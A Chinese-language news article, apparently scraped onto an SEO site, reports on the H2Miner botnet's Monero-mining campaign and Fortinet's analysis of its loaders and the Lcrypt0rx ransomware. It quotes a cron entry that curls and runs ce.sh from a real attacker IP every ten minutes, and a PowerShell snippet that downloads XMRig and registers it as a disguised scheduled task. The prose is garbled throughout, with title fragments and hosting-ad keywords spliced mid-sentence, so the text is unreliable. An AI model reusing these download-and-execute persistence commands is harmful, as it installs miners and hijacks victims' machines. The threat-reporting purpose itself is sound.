您现在的位置是:亿华灵动 > 数据库
H2Miner 僵尸网络攻击 Linux、Windows 及容器设备进行门罗币挖矿
亿华灵动2025-11-26 18:37:07【数据库】1人已围观
简介首次发现于2019年末的H2Miner僵尸网络近期卷土重来,其攻击手段已突破加密货币劫持与勒索软件的界限。最新攻击活动利用廉价虚拟专用服务器(VPS)和多种常见恶意软件,同时入侵Linux主机、Win
首次发现于2019年末的僵尸及容H2Miner僵尸网络近期卷土重来 ,其攻击手段已突破加密货币劫持与勒索软件的网络挖矿界限 。最新攻击活动利用廉价虚拟专用服务器(VPS)和多种常见恶意软件 ,攻击同时入侵Linux主机、器设Windows工作站和容器工作负载 。备进

攻击者通过组合云环境感知脚本 、行门跨平台编译二进制文件以及系统原生命令,罗币能在防御者察觉CPU负载异常前快速建立门罗币挖矿通道。香港云服务器僵尸及容攻击始于对配置错误服务或漏洞应用的网络挖矿利用,包括Apache ActiveMQ(CVE-2023-46604)和Log4Shell漏洞。攻击
入侵成功后 ,器设僵尸网络会部署定制化加载脚本——Linux系统使用ce.sh ,备进Windows系统使用1.ps1——这些脚本会终止其他挖矿进程、行门禁用终端防护,罗币并从78.153.140.66下载XMRig挖矿程序。僵尸及容容器环境同样遭受攻击 :spr.sh脚本会扫描Docker镜像并移除阿里云的高防服务器aegis防护代理 ,随后植入Kinsing恶意软件 。
复合型攻击基础设施同一攻击基础设施还托管着位于47.97.113.36的Cobalt Strike团队服务器,以及伪装成"MicrosoftSoftware.exe"的Bitbucket代码仓库,显示出成熟的多层命令与控制(C2)架构 。Fortinet分析师发现 ,云计算新型VBScript勒索软件Lcrypt0rx已与挖矿程序捆绑传播。

虽然其加密算法较为简单——采用8,192字符的XOR密钥结合文件专属盐值——但该脚本仍会覆写主引导记录(MBR) ,并在系统中散布伪装持久化钩子。

钱包地址与托管服务器的重叠表明 ,当前攻击者可能与H2Miner原始团队存在协作或从属关系。
持久化机制剖析H2Miner通过分层感染链实现持久化 。初始脚本会枚举防御进程,源码库使用暴力正则表达式终止这些进程 ,并通过清除命令历史来抹除攻击痕迹 。

Linux系统中 ,ce.sh会植入每10分钟自我重下载的cron计划任务 :
复制( crontab -l 2>/dev/null ; \ echo "*/10 * * * * curl -fsSL http://80.64.16.241/ce.sh | sh" ) | crontab -1.2.Windows系统则通过1.ps1脚本将XMRig注册为计划任务 :
复制$miner = "$env:TEMP\sysupdate.exe" Invoke-WebRequest -Uri "http://78.153.140.66/xmrig.exe" -OutFile $miner schtasks /create /f /tn "Update service for Windows Service" ` /tr "$miner" /sc minute /mo 15 /rl highest1.2.3.4. 复合防御策略需求在Windows平台,Lcrypt0rx通过Shell.Application提权后 ,会尝试修改Winlogon Shell和映像劫持(IFEO)注册表键实现持久化。虽然注册表逻辑存在缺陷,但恶意软件通过部署6个辅助脚本(从循环执行杀毒软件终止的亿华云advapi32_ext.vbs,到基础自传播脚本USB_bridge.vbs)确保存活。

这些辅助脚本均以隐藏系统文件属性(+h +s +r)投放 ,并通过注册表自启动项调用。配合cpr.sh等频繁更新的脚本,即使部分组件被清除,僵尸网络仍能重建挖矿通道 。防御者需全面清理容器镜像、服务器租用计划任务 、cron条目和异常注册表键 ,否则门罗币钱包(如4ASk4RhU...p8SahC)将在警报解除后持续窃取计算资源。
很赞哦!(791)
相关文章
- CDK Global 遭遇攻击导致系统中断,影响数千家美国汽车经销商
- 联想电脑无法启用VT教程(解决联想电脑无法启用VT功能的方法及步骤)
- 小红书的正品认证是否可靠?(探究小红书正品认证的可信度及用户体验)
- 电脑程序频繁关闭的问题(探究程序错误关闭的原因及解决方法)
- 每位首席信息安全官在董事会会议中应该能够回答的五个问题
- 电脑记忆卡片设计教程(掌握设计技巧,打造高性能电脑记忆卡片)
- 自制迷你电脑盒子教程大全(打造个性化的迷你电脑盒子,实现您的创意想法)
- 酷派9976D手机的功能和性能评测(一款高性能智能手机,以酷派9976D手机的功能和性能为例)
- 美国贷款巨头库珀先生泄露了1470万名客户数据
- 重启电脑后出现蓝屏错误界面,如何解决?(电脑蓝屏错误的原因及解决方法)
热门文章
站长推荐
友情链接
- 探索如何将锁屏变成个性主题(打造独特的手机锁屏体验)
- 数据中心电源的五大趋势
- SKG抽油烟机质量评测(全面分析SKG抽油烟机的性能与可靠性)
- 免费看电视软件推荐——精彩影音尽在掌握(解放你的电视观影体验,畅享高清精彩内容)
- 外星人声卡(探索未知领域的声音艺术)
- HTCM8像素之超越期待的照相机(HTCM8搭载的照相技术让您拍照更具细节和清晰度)
- IBM携手腾讯联合发布《无边界零售》白皮书:洞察行业新格局,赋能企业“无边界零售”转型
- NVIDIA发布云原生超级计算架构:优化算力结构,赋能业务上云,降低数据中心能耗
- 探讨1200兆路由器的性能和功能(高速、稳定、全面覆盖的无线网络体验)
- 中兴红牛v5电信版(一款高性能电信版手机,满足您的需求) 网站建设企业服务器云服务器b2b信息平台源码库亿华云香港物理机







